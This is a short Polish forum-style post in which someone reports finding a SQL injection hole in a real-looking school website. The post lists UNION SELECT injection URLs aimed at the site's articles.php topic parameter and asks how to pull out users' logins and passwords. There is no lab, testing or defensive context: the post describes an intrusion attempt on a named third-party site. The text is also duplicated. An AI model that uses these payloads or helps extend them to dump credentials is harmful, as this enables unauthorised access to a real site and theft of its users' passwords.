Mam takie pytanie otóż znalazłem strone podatną na atak sql injection oto ona:
http://www.gim3.eu/articles.php?topic=4
więc wszystko co robie:
http://www.gim3.eu/articles.php?topic=-4 union select 1,2,3,4,5 -- wszystkie tabele tam
http://www.gim3.eu/articles.php?topic=-4 union select 1,user(),3,4,5 --
tylko, nie wiem co zrobić żeby się wyświetliły hasła i loginy czy muszę wpierw poznać nazwę tabeli i się wstrzelić w nią ?
http://www.gim3.eu/articles.php?topic=4
więc wszystko co robie:
http://www.gim3.eu/articles.php?topic=-4 union select 1,2,3,4,5 -- wszystkie tabele tam
http://www.gim3.eu/articles.php?topic=-4 union select 1,user(),3,4,5 --
tylko, nie wiem co zrobić żeby się wyświetliły hasła i loginy czy muszę wpierw poznać nazwę tabeli i się wstrzelić w nią ?